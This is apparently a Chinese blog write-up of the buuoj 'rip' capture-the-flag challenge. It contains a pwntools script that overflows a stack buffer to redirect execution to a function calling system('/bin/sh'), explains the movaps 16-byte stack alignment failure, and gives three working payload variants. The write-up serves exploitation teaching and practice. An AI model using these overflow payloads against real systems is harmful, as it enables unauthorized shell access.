buuoj —— rip

常规思路

s溢出后将返回地址修改为fun函数地址,然而出错了

from pwn import *
# context(os="linux", arch="amd64", log_level="debug")

p = remote('node3.buuoj.cn',27714)
# p = process('./pwn1')
elf = ELF("./pwn1")
f_addr = elf.symbols["fun"]
payload = 'a'*23 + p64(f_addr)
p.sendline(payload)
p.interactive()
p.close()

在这里插入图片描述

原因

movaps指令是16字节对齐
【相关解释:
https://blog.csdn.net/happyblreay/article/details/104226884
http://blog.eonew.cn/archives/958#i-4】

测试 shell.c

// compiled: gcc -g -no-pie -Og shell.c -o shell
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main()
{
    system("/bin/sh");
    return 0;
}

程序编译之后能正常运行,但是我们要的是让程序不正常运行:
system函数调用了do_system,且do_system+1094处是movaps指令,因此在这里下断点,发现rsp+0x40是一个16字节对齐的地址为0x7fffffffdea0。
在这里插入图片描述
但如果将rsp+1
在这里插入图片描述
程序便出错了
在这里插入图片描述
而在本题中,用上面的脚本,执行到fun函数的call system指令时,栈(esp)并不是16字节对齐的,因此会报错。
在这里插入图片描述

成功方案

解决的核心思想是在call system语句时,esp是16字节对齐的。有以下三种解决办法。
1)payload = ‘a’*(0xF) + p64(f_addr)
这里虽然没有覆盖返回地址,而是继续返回调用main函数的__libc_start_main,该函数会执行call ebp,而此时ebp为leave时赋值的f_addr,且此时是栈对齐的。因此可以顺利执行fun函数。

2)payload = ‘a’*(0xF+0x8) + p64(f_addr + 1)
返回时跳过了fun函数的第一条指令push rbp,因此在call system指令时是栈对齐的。

3)retn = 0x401198
payload = ‘a’*23+p64(retn)+p64(0x401186)
返回时先执行了一句retn,栈弹出了8字节,从而使得call system指令时是栈对齐的。

参考链接

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值